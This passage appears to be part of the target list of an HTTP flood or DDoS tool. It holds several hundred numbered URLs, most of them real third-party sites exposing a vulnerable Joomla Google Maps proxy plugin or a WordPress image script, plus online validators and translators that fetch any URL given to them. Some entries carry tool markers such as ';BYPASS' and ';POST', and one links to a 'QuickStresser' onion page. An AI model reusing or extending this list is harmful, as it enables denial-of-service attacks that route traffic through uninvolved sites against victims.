| http://sova-tour.com.ua/plugins/system/plugin_googlemap2_proxy.php?url= 94 | http://scu-oldesloe.de/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 95 | http://translate.yandex.ru/translate?srv=yasearch&lang=ru-uk&url= 96 | http://translate.yandex.ua/translate?srv=yasearch&lang=ru-uk&url= 97 | http://translate.yandex.net/tr-url/ru-uk.uk/ 98 | http://www.bongert.lu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 99 | http://laresmadrid.org/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 100 | http://doleorganic.com/plugins/content/plugin_googlemap2_proxy.php?url= 101 | http://crawfordlivestock.com/plugins/system/plugin_googlemap2_proxy.php?url= 102 | http://www.aculaval.com/joomla/plugins/system/plugin_googlemap2_proxy.php?url= 103 | http://grandsultansaloon.com/plugins/system/plugin_googlemap2_proxy.php?url= 104 | http://www.d1010449.cp.blacknight.com/cpr.ie/plugins/content/plugin_googlemap2_proxy.php?url= 105 | http://www.architettaresas.it/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 106 | http://basketgbkoekelare.be/plugins/content/plugin_googlemap2_proxy.php?url= 107 | http://www.arbitresmultisports.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 108 | http://mobilrecord.com/plugins/content/plugin_googlemap2_proxy.php?url= 109 | http://www.dbaa.co.za/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 110 | http://waggum-bevenrode.sg-bevenrode.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 111 | http://bwsnt1.pdsda.net/plugins/system/plugin_googlemap3_proxy.php?url= 112 | http://www.astecdisseny.com/plugins/content/plugin_googlemap2_proxy.php?url= 113 | http://www.fillmorefairways.com/plugins/content/plugin_googlemap2_proxy.php?url= 114 | http://www.bus-reichert.eu/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 115 | http://www.maxxxi.ru/plugins/system/plugin_googlemap2_proxy.php?url= 116 | http://potholepeople.co.nz/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 117 | http://www.hammondgolf.com/plugins/system/plugin_googlemap2_proxy.php?url= 118 | http://www.footgoal33.com/plugins/content/plugin_googlemap2_proxy.php?url= 119 | http://bbtoma.com/plugins/content/plugin_googlemap2_proxy.php?url= 120 | http://www.tajmahalrestaurant.co.za/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 121 | http://www.yerbabuenacuisine.com/plugins/system/plugin_googlemap2_proxy.php?url= 122 | http://www.rinner-alm.com/plugins/system/plugin_googlemap2_proxy.php?url= 123 | http://stockbridgetownhall.co.uk/plugins/content/plugin_googlemap2_proxy.php?url= 124 | http://mentzerrepairs.com/plugins/system/plugin_googlemap2_proxy.php?url= 125 | http://www.tilmouthwell.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 126 | http://www.homevisionsinc.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 127 | http://toddlers.nalanda.edu.in/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 128 | http://cultura-city.rv.ua/plugins/system/plugin_googlemap3_proxy.php?url= 129 | http://secret.leylines.info/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 130 | http://bike-electric.co.uk/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 131 | http://www.centroaquaria.com/plugins/content/plugin_googlemap2_proxy.php?url= 132 | http://agenzia-anna.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 133 | http://www.gretnadrug.com/plugins/system/plugin_googlemap2_proxy.php?url= 134 | http://www.crestwoodpediatric.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 135 | http://www.oceans-wien.com/plugins/system/plugin_googlemap2_proxy.php?url=;BYPASS 136 | http://lavori.joomlaskin.it/italyhotels/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file= 137 | http://santaclaradelmar.com/hoteles/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file= 138 | http://www.authentic-luxe-locations.com/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file= 139 | http://www.keenecinemas.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 140 | http://www.hotelmonyoli.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 141 | http://prosperitydrug.com/plugins/content/plugin_googlemap2_proxy.php?url= 142 | http://policlinicamonteabraao.com/plugins/content/plugin_googlemap2_proxy.php?url= 143 | http://www.vetreriafasanese.com/plugins/system/plugin_googlemap2_proxy.php?url= 144 | http://www.benawifi.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 145 | http://www.valleyview.sa.edu.au/plugins/system/plugin_googlemap2_proxy.php?url= 146 | http://www.racersedgekarting.com/plugins/content/plugin_googlemap2_proxy.php?url= 147 | http://www.minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url=?url= 148 | http://www.villamagnoliarelais.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 149 | http://worldwide-trips.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 150 | http://systemnet.com.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 151 | http://www.netacad.lviv.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 152 | http://www.veloclub.ru/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 153 | http://www.virtualsoft.pl/plugins/content/plugin_googlemap3_proxy.php?url= 154 | http://gminazdzieszowice.pl/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 155 | http://fets3.freetranslation.com/?Language=English%2FSpanish&Sequence=core&Url= 156 | http://www.fare-furore.com/com-line/plugins/content/plugin_googlemap2_proxy.php?url= 157 | http://www.rotisseriesalaberry.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 158 | http://www.lbajoinery.com.au/plugins/content/plugin_googlemap2_proxy.php?url= 159 | http://www.seebybike.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 160 | http://www.copiflash.com/plugins/content/plugin_googlemap2_proxy.php?url= 161 | http://suttoncenterstore.com/plugins/system/plugin_googlemap2_proxy.php?url= 162 | http://coastalcenter.net/plugins/system/plugin_googlemap2_proxy.php?url= 163 | http://whitehousesurgery.org/plugins/content/plugin_googlemap2_proxy.php?url= 164 | http://www.vertexi.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 165 | http://www.owl.cat/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 166 | http://www.sizzlebistro.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 167 | http://thebluepine.com/plugins/system/plugin_googlemap2_proxy.php?url= 168 | http://donellis.ie/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 169 | http://validator.w3.org/unicorn/check?ucn_task=conformance&ucn_uri= 170 | http://validator.w3.org/nu/?doc= 171 | http://check-host.net/check-http?host= 172 | http://www.netvibes.com/subscribe.php?url= 173 | http://www-test.cisel.ch/web/plugins/content/plugin_googlemap2_proxy.php?url= 174 | http://www.sistem5.net/ww/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 175 | http://www.fmradiom.hu/palosvorosmart/plugins/content/plugin_googlemap2_proxy.php?url= 176 | http://www.iguassusoft.com/site/plugins/content/plugin_googlemap2_proxy.php?url= 177 | http://lab.univ-batna.dz/lea/plugins/system/plugin_googlemap2_proxy.php?url= 178 | http://www.computerpoint3.it/cp3/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 179 | http://hotel-veles.com/plugins/content/plugin_googlemap2_proxy.php?url= 180 | http://klaassienatuinstra.nl/plugins/content/plugin_googlemap2_proxy.php?url= 181 | http://www.google.com/ig/add?feedurl= 182 | http://anonymouse.org/cgi-bin/anon-www.cgi/ 183 | http://www.google.com/translate?u= 184 | http://translate.google.com/translate?u= 185 | http://validator.w3.org/feed/check.cgi?url= 186 | http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs= 187 | http://validator.w3.org/check?uri= 188 | http://jigsaw.w3.org/css-validator/validator?uri= 189 | http://validator.w3.org/checklink?uri= 190 | http://qa-dev.w3.org/unicorn/check?ucn_task=conformance&ucn_uri= 191 | http://www.w3.org/RDF/Validator/ARPServlet?URI= 192 | http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile= 193 | http://www.w3.org/services/tidy?docAddr= 194 | http://validator.w3.org/mobile/check?docAddr= 195 | http://validator.w3.org/p3p/20020128/p3p.pl?uri= 196 | http://validator.w3.org/p3p/20020128/policy.pl?uri= 197 | http://online.htmlvalidator.com/php/onlinevallite.php?url= 198 | http://feedvalidator.org/check.cgi?url= 199 | http://gmodules.com/ig/creator?url= 200 | http://www.google.com/ig/adde?moduleurl= 201 | http://www.cynthiasays.com/mynewtester/cynthia.exe?rptmode=-1&url1= 202 | http://www.watchmouse.com/en/checkit.php?c=jpcheckit&vurl= 203 | http://host-tracker.com/check_page/?furl= 204 | http://panel.stopthehacker.com/services/validate-payflow?email=1@1.com&callback=a&target= 205 | http://www.viewdns.info/ismysitedown/?domain= 206 | http://www.onlinewebcheck.com/check.php?url= 207 | http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL= 208 | http://www.translate.ru/url/translation.aspx?direction=er&sourceURL= 209 | http://streamitwebseries.twww.tv/proxy.php?url= 210 | http://www.comicgeekspeak.com/proxy.php?url= 211 | https://www.google.com/search?q= 212 | https://check-host.net/ 213 | https://www.facebook.com/ 214 | https://www.youtube.com/ 215 | https://www.fbi.com/ 216 | https://www.bing.com/search?q= 217 | https://r.search.yahoo.com/ 218 | https://www.cia.gov/index.html 219 | http://netsec-reborn.onion/QuickStresser-virus?id= 220 | https://vk.com/profile.php?redirect= 221 | https://www.usatoday.com/search/results?q= 222 | https://help.baidu.com/searchResult?keywords= 223 | https://steamcommunity.com/market/search?q= 224 | https://www.ted.com/search?q= 225 | https://play.google.com/store/search?q= 226 | https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u= 227 | https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u= 228 | https://drive.google.com/viewerng/viewer?url= 229 | http://www.google.com/translate?u= 230 | https://developers.google.com/speed/pagespeed/insights/?url= 231 | http://help.baidu.com/searchResult?keywords= 232 | http://www.bing.com/search?q= 233 | https://add.my.yahoo.com/rss?url= 234 | https://play.google.com/store/search?q= 235 | http://www.google.com/?q= 236 | http://regex.info/exif.cgi?url= 237 | http://anonymouse.org/cgi-bin/anon-www.cgi/ 238 | http://www.google.com/translate?u= 239 | http://translate.google.com/translate?u= 240 | http://validator.w3.org/feed/check.cgi?url= 241 | http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs= 242 | http://validator.w3.org/check?uri= 243 | http://jigsaw.w3.org/css-validator/validator?uri= 244 | http://validator.w3.org/checklink?uri= 245 | http://www.w3.org/RDF/Validator/ARPServlet?URI= 246 | http://www.w3.org/2005/08/online_xslt/xslt?xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl&xmlfile= 247 | http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile= 248 | http://validator.w3.org/mobile/check?docAddr= 249 | http://validator.w3.org/p3p/20020128/p3p.pl?uri= 250 | http://online.htmlvalidator.com/php/onlinevallite.php?url= 251 | http://feedvalidator.org/check.cgi?url= 252 | http://gmodules.com/ig/creator?url= 253 | http://www.google.com/ig/adde?moduleurl= 254 | http://www.cynthiasays.com/mynewtester/cynthia.exe?rptmode=-1&url1= 255 | http://www.watchmouse.com/en/checkit.php?c=jpcheckit&vurl= 256 | http://host-tracker.com/check_page/?furl= 257 | http://panel.stopthehacker.com/services/validate-payflow?email=1@1.com&callback=a&target= 258 | http://www.onlinewebcheck.com/check.php?url= 259 | http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL= 260 | http://www.translate.ru/url/translation.aspx?direction=er&sourceURL= 261 | http://about42.nl/www/showheaders.php;POST;about42.nl.txt 262 | http://browsershots.org;POST;browsershots.org.txt 263 | http://streamitwebseries.twww.tv/proxy.php?url= 264 | http://www.comicgeekspeak.com/proxy.php?url= 265 | http://67.20.105.143/bitess/plugins/content/plugin_googlemap2_proxy.php?url= 266 | http://bemaxjavea.com/javea-rentals-alquileres/plugins/content/plugin_googlemap2_proxy.php?url= 267 | http://centrobrico.net/plugins/content/plugin_googlemap2_proxy.php?url= 268 | http://conodeluz.org/magnanet/plugins/content/plugin_googlemap2_proxy.php?url= 269 | http://greenappledentaldt.com/home/templates/plugins/content/plugin_googlemap2_proxy.php?url= 270 | http://html.strost.ch/dgi/plugins/content/plugin_googlemap2_proxy.php?url= 271 | http://kobbeleia.net/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 272 | http://krd-medway.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= 273 | http://minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url= 274 | http://old.ucpb.org/plugins/content/plugin_googlemap2_proxy.php?url= 275 | http://www.abs-silos.de/en/plugins/content/plugin_googlemap2_proxy.php?url= 276 | http://www.admksg.ru/plugins/content/plugin_googlemap2_proxy.php?url= 277 | http://www.autoklyszewski.pl/autoklyszewski/mambots/content/plugin_googlemap2_proxy.php?url= 278 | http://www.build.or.at/plugins/content/plugin_googlemap2_proxy.php?url= 279 | http://www.caiverbano.it/sito/plugins/content/plugin_googlemap2_proxy.php?url= 280 | http://www.cbcstittsville.com/home/plugins/content/plugin_googlemap2_proxy.php?url= 281 | http://www.ciutatdeivissa.org/portal/plugins/content/plugin_googlemap2_proxy.php?url= 282 | http://www.contrau.com.br/web/plugins/content/plugin_googlemap2_proxy.php?url= 283 | http://www.dierenhotelspaubeek.nl/plugins/content/plugin_googlemap2_proxy.php?url= 284 | http://www.gaston-schul.nl/DU/plugins/content/plugin_googlemap2_proxy.php?url= 285 | http://www.gaston-schul.nl/FR/plugins/content/plugin_googlemap2_proxy.php?url= 286 | http://www.gillinghamgurdwara.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= 287 | http://www.gilmeuble.ch/cms/plugins/content/plugin_googlemap2_proxy.php?url= 288 | http://www.hortonmccormick.com/cms/plugins/content/plugin_googlemap2_proxy.php?url= 289 | http://www.kanzlei-berendes.de/homepage/plugins/content/plugin_googlemap2_proxy.php?url= 290 | http://www.kita-spielhaus.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 291 | http://www.lacasaencarilo.com.ar/sitio/plugins/content/plugin_googlemap2_proxy.php?url= 292 | http://www.losaromos-spa.com.ar/cms/plugins/content/plugin_googlemap2_proxy.php?url= 293 | http://www.losaromos-spa.com.ar/~losaromo/cms/plugins/content/plugin_googlemap2_proxy.php?url= 294 | http://www.nickclift.co.uk/web/plugins/content/plugin_googlemap2_proxy.php?url= 295 | http://www.palagini.it/palagini/plugins/content/plugin_googlemap2_proxy.php?url= 296 | http://www.parsifaldisco.com/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 297 | http://www.podosys.com/csm/plugins/content/plugin_googlemap2_proxy.php?url= 298 | http://www.renault-windisch.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 299 | http://www.riegler-dorner.at/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 300 | http://www.seevilla-dr-sturm.at/cms/plugins/content/plugin_googlemap2_proxy.php?url= 301 | http://www.sounders.es/plugins/content/plugin_googlemap2_proxy.php?url= 302 | http://www.suelcasa.com/suelcasa/plugins/content/plugin_googlemap2_proxy.php?url= 303 | http://www.tcl.lu/Site/plugins/content/plugin_googlemap2_proxy.php?url= 304 | http://www.tijssen-staal.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= 305 | http://www.triatarim.com.tr/TriaEn/plugins/content/plugin_googlemap2_proxy.php?url= 306 | http://www.tus-haltern.de/site/plugins/content/plugin_googlemap2_proxy.php?url= 307 | http://www.vm-esslingen.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= 308 | http://www.zahnarzt-buhl.de/praxis/plugins/content/plugin_googlemap2_proxy.php?url= 309 | http://www.sultanpalace.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= 310 | http://www.bergenpol.com/cms//plugins/content/plugin_googlemap2_proxy.php?url= 311 | http://www.arantzabelaikastola.com/webgunea//plugins/content/plugin_googlemap2_proxy.php?url= 312 | http://www.fare-furore.com/plugins/content/plugin_googlemap2_proxy.php?url= 313 | http://www.dog-ryusen.com/plugins/system/plugin_googlemap2_proxy.php?url= 314 | http://www.spvgg-roedersheim.de/web/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 315 | http://www.dahlnet.no/v2/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 316 | http://ping-admin.ru/index.sema;POST;ping-admin.ru.txt 317 | http://web-sniffer.net/?url= 318 | http://sova-tour.com.ua/plugins/system/plugin_googlemap2_proxy.php?url= 319 | http://scu-oldesloe.de/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 320 | http://translate.yandex.ru/translate?srv=yasearch&lang=ru-uk&url= 321 | http://translate.yandex.ua/translate?srv=yasearch&lang=ru-uk&url= 322 | http://translate.yandex.net/tr-url/ru-uk.uk/ 323 | http://www.bongert.lu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 324 | http://laresmadrid.org/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 325 | http://doleorganic.com/plugins/content/plugin_googlemap2_proxy.php?url= 326 | http://crawfordlivestock.com/plugins/system/plugin_googlemap2_proxy.php?url= 327 | http://www.aculaval.com/joomla/plugins/system/plugin_googlemap2_proxy.php?url= 328 | http://grandsultansaloon.com/plugins/system/plugin_googlemap2_proxy.php?url= 329 | http://www.d1010449.cp.blacknight.com/cpr.ie/plugins/content/plugin_googlemap2_proxy.php?url= 330 | http://www.architettaresas.it/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 331 | http://basketgbkoekelare.be/plugins/content/plugin_googlemap2_proxy.php?url= 332 | http://www.arbitresmultisports.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 333 | http://mobilrecord.com/plugins/content/plugin_googlemap2_proxy.php?url= 334 | http://www.dbaa.co.za/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 335 | http://waggum-bevenrode.sg-bevenrode.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 336 | http://bwsnt1.pdsda.net/plugins/system/plugin_googlemap3_proxy.php?url= 337 | http://www.astecdisseny.com/plugins/content/plugin_googlemap2_proxy.php?url= 338 | http://www.fillmorefairways.com/plugins/content/plugin_googlemap2_proxy.php?url= 339 | http://www.bus-reichert.eu/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 340 | http://www.maxxxi.ru/plugins/system/plugin_googlemap2_proxy.php?url= 341 | http://potholepeople.co.nz/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 342 | http://www.hammondgolf.com/plugins/system/plugin_googlemap2_proxy.php?url= 343 | http://www.footgoal33.com/plugins/content/plugin_googlemap2_proxy.php?url= 344 | http://bbtoma.com/plugins/content/plugin_googlemap2_proxy.php?url= 345 | http://www.tajmahalrestaurant.co.za/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 346 | http://www.yerbabuenacuisine.com/plugins/system/plugin_googlemap2_proxy.php?url= 347 | http://www.rinner-alm.com/plugins/system/plugin_googlemap2_proxy.php?url= 348 | http://stockbridgetownhall.co.uk/plugins/content/plugin_googlemap2_proxy.php?url= 349 | http://mentzerrepairs.com/plugins/system/plugin_googlemap2_proxy.php?url= 350 | http://www.tilmouthwell.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 351 | http://www.homevisionsinc.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 352 | http://toddlers.nalanda.edu.in/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 353 | http://cultura-city.rv.ua/plugins/system/plugin_googlemap3_proxy.php?url= 354 | http://secret.leylines.info/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 355 | http://bike-electric.co.uk/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 356 | http://www.centroaquaria.com/plugins/content/plugin_googlemap2_proxy.php?url= 357 | http://agenzia-anna.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 358 | http://www.gretnadrug.com/plugins/system/plugin_googlemap2_proxy.php?url= 359 | http://www.crestwoodpediatric.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 360 | http://www.oceans-wien.com/plugins/system/plugin_googlemap2_proxy.php?url=;BYPASS 361 | http://lavori.joomlaskin.it/italyhotels/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file= 362 | http://santaclaradelmar.com/hoteles/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file= 363 | http://www.authentic-luxe-locations.com/wp-content/plugins/js-multihotel/includes/show_image.php?w=1&h=1&file= 364 | http://www.keenecinemas.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 365 | http://www.hotelmonyoli.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 366 | http://prosperitydrug.com/plugins/content/plugin_googlemap2_proxy.php?url= 367 | http://policlinicamonteabraao.com/plugins/content/plugin_googlemap2_proxy.php?url= 368 | http://www.vetreriafasanese.com/plugins/system/plugin_googlemap2_proxy.php?url= 369 | http://www.benawifi.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 370 | http://www.valleyview.sa.edu.au/plugins/system/plugin_googlemap2_proxy.php?url= 371 | http://www.racersedgekarting.com/plugins/content/plugin_googlemap2_proxy.php?url= 372 | http://www.minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url=?url= 373 | http://www.villamagnoliarelais.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 374 | http://worldwide-trips.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 375 | http://systemnet.com.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 376 | http://www.netacad.lviv.ua/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 377 | http://www.veloclub.ru/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 378 | http://www.virtualsoft.pl/plugins/content/plugin_googlemap3_proxy.php?url= 379 | http://gminazdzieszowice.pl/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= 380 | http://fets3.freetranslation.com/?Language=English%2FSpanish&Sequence=core&Url= 381 | http://www.fare-furore.com/com-line/plugins/content/plugin_googlemap2_proxy.php?url= 382 | http://www.rotisseriesalaberry.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 383 | http://www.lbajoinery.com.au/plugins/content/plugin_googlemap2_proxy.php?url= 384 | http://www.seebybike.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 385 | http://www.copiflash.com/plugins/content/plugin_googlemap2_proxy.php?url= 386 | http://suttoncenterstore.com/plugins/system/plugin_googlemap2_proxy.php?url= 387 | http://coastalcenter.net/plugins/system/plugin_googlemap2_proxy.php?url= 388 | http://whitehousesurgery.org/plugins/content/plugin_googlemap2_proxy.php?url= 389 | http://www.vertexi.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 390 | http://www.owl.cat/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 391 | http://www.sizzlebistro.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 392 | http://thebluepine.com/plugins/system/plugin_googlemap2_proxy.php?url= 393 | http://donellis.ie/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 394 | http://validator.w3.org/unicorn/check?ucn_task=conformance&ucn_uri= 395 | http://validator.w3.org/nu/?doc= 396 | http://check-host.net/check-http?host= 397 | http://www.netvibes.com/subscribe.php?url= 398 | http://www-test.cisel.ch/web/plugins/content/plugin_googlemap2_proxy.php?url= 399 | http://www.sistem5.net/ww/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 400 | http://www.fmradiom.hu/palosvorosmart/plugins/content/plugin_googlemap2_proxy.php?url= 401 | http://www.iguassusoft.com/site/plugins/content/plugin_googlemap2_proxy.php?url= 402 | http://lab.univ-batna.dz/lea/plugins/system/plugin_googlemap2_proxy.php?url= 403 | http://www.computerpoint3.it/cp3/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= 404 | http://hotel-veles.com/plugins/content/plugin_googlemap2_proxy.php?url= 405 | http://klaassienatuinstra.nl/plugins/content/plugin_googlemap2_proxy.php?url= 406 | http://www.google.com/ig/add?feedurl= 407 | http://anonymouse.org/cgi-bin/anon-www.cgi/ 408 | http://www.google.com/translate?u= 409 | http://translate.google.com/translate?u= 410 | http://validator.w3.org/feed/check.cgi?url= 411 | http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs= 412 | http://validator.w3.org/check?uri= 413 | http://jigsaw.w3.org/css-validator/validator?uri= 414 | http://validator.w3.org/checklink?uri= 415 | http://qa-dev.w3.org/unicorn/check?ucn_task=conformance&ucn_uri= 416 | http://www.w3.org/RDF/Validator/ARPServlet?URI= 417 | http://www.w3.org/2005/08/online_xslt/xslt?xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl&xmlfile= 418 | http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile= 419 | http://www.w3.org/services/tidy?docAddr= 420 | http://validator.w3.org/mobile/check?docAddr= 421 | http://validator.w3.org/p3p/20020128/p3p.pl?uri= 422 | http://validator.w3.org/p3p/20020128/policy.pl?uri= 423 | http://online.htmlvalidator.com/php/onlinevallite.php?url= 424 | http://feedvalidator.org/check.cgi?url= 425 | http://gmodules.com/ig/creator?url= 426 | http://www.google.com/ig/adde?moduleurl= 427 | http://www.cynthiasays.com/mynewtester/cynthia.exe?rptmode=-1&url1= 428 | http://www.watchmouse.com/en/checkit.php?c=jpcheckit&vurl= 429 | http://host-tracker.com/check_page/?furl= 430 | http://panel.stopthehacker.com/services/validate-payflow?email=1@1.com&callback=a&target= 431 | http://www.viewdns.info/ismysitedown/?domain= 432 | http://www.onlinewebcheck.com/check.php?url= 433 | http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL= 434 | http://www.translate.ru/url/translation.aspx?direction=er&sourceURL= 435 | http://about42.nl/www/showheaders.php;POST;about42.nl.txt 436 | http://browsershots.org;POST;browsershots.org.txt 437 | http://streamitwebseries.twww.tv/proxy.php?url= 438 | http://www.comicgeekspeak.com/proxy.php?url= 439 | http://67.20.105.143/bitess/plugins/content/plugin_googlemap2_proxy.php?url= 440 | http://bemaxjavea.com/javea-rentals-alquileres/plugins/content/plugin_googlemap2_proxy.php?url= 441 | http://centrobrico.net/plugins/content/plugin_googlemap2_proxy.php?url= 442 | http://conodeluz.org/magnanet/plugins/content/plugin_googlemap2_proxy.php?url= 443 | http://greenappledentaldt.com/home/templates/plugins/content/plugin_googlemap2_proxy.php?url= 444 | http://html.strost.ch/dgi/plugins/content/plugin_googlemap2_proxy.php?url= 445 | http://ijzerhandeljanssen.nl/web/plugins/content/plugin_googlemap2_proxy.php?url= 446 | http://kobbeleia.net/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 447 | http://krd-medway.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= 448 | http://link2europe.com/joomla/plugins/content/plugin_googlemap2_proxy.php?url= 449 | http://minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url= 450 | http://old.ucpb.org/plugins/content/plugin_googlemap2_proxy.php?url= 451 | http://peelmc.ca/plugins/content/plugin_googlemap2_proxy.php?url= 452 | http://s2p.lt/main/plugins/content/plugin_googlemap2_proxy.php?url= 453 | http://smartonecity.com/pt/plugins/content/plugin_googlemap2_proxy.php?url= 454 | http://snelderssport.nl/web/plugins/content/plugin_googlemap2_proxy.php?url= 455 | http://sunnyhillsassistedliving.com/plugins/content/plugin_googlemap2_proxy.php?url= 456 | http://thevintagechurch.com/www2/index.php?url=/plugins/content/plugin_googlemap2_proxy.php?url= 457 | http://www.abc-haus.ch/reinigung/plugins/content/plugin_googlemap2_proxy.php?url= 458 | http://www.abs-silos.de/en/plugins/content/plugin_googlemap2_proxy.php?url= 459 | http://www.admksg.ru/plugins/content/plugin_googlemap2_proxy.php?url= 460 | http://www.alhambrahotel.net/site/plugins/content/plugin_googlemap2_proxy.php?url= 461 | http://www.aliento.ch/cms/plugins/content/plugin_googlemap2_proxy.php?url= 462 | http://www.autoklyszewski.pl/autoklyszewski/mambots/content/plugin_googlemap2_proxy.php?url= 463 | http://www.build.or.at/plugins/content/plugin_googlemap2_proxy.php?url= 464 | http://www.caiverbano.it/sito/plugins/content/plugin_googlemap2_proxy.php?url= 465 | http://www.cbcstittsville.com/home/plugins/content/plugin_googlemap2_proxy.php?url= 466 | http://www.ciutatdeivissa.org/portal/plugins/content/plugin_googlemap2_proxy.php?url= 467 | http://www.contrau.com.br/web/plugins/content/plugin_googlemap2_proxy.php?url= 468 | http://www.dierenhotelspaubeek.nl/plugins/content/plugin_googlemap2_proxy.php?url= 469 | http://www.fotorima.com/rima/site2/plugins/content/plugin_googlemap2_proxy.php?url= 470 | 